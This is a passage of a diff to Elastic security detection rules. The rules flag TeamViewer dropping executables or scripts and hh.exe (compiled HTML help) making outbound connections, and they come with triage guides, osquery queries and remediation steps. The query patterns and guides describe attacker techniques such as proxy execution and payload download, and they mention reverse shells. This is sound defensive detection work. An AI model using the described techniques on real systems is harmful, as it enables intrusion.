subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\") and\n not \n (\n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\*.js\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\?\\\\TeamViewer\\\\update.exe\"\n ) and process.code_signature.trusted == true\n )\n", "references": [ "http://web.archive.org/web/20230329160957/https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_101.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_101.json index c6420a2b9aa..ae02465c02f 100644 --- a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_101.json +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_102.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_102.json index 7b3165471b9..2298ac1adcd 100644 --- a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_102.json b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_102.json index 768f9f7ff2b..4c3cdee6855 100644 --- a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_103.json b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_103.json index 71cf18e26b0..ff35361c35e 100644 --- a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_103.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"hh.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"hh.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_104.json b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_104.json index 8469a808bd9..80ff93aa289 100644 --- a/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b29ee2be-bf99-446c-ab1a-2dc0183394b8_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Compiled HTML File", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Compiled HTML File\n\nCHM (Compiled HTML) files are a format for delivering online help files on Windows. CHM files are compressed compilations of various content, such as HTML documents, images, and scripting/web-related programming languages such as VBA, JScript, Java, and ActiveX.\n\nWhen users double-click CHM files, the HTML Help executable program (`hh.exe`) will execute them. `hh.exe` also can be used to execute code embedded in those files, PowerShell scripts, and executables. This makes it useful for attackers not only to proxy the execution of malicious payloads via a signed binary that could bypass security controls, but also to gain initial access to environments via social engineering methods.\n\nThis rule identifies network connections done by `hh.exe`, which can potentially indicate abuse to download malicious files or tooling, or masquerading.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Examine the command lines for suspicious activities.\n - Retrieve `.chm`, `.ps1`, and other files that were involved for further examination.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executables, scripts and help files retrieved from the system using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"hh.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"hh.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", 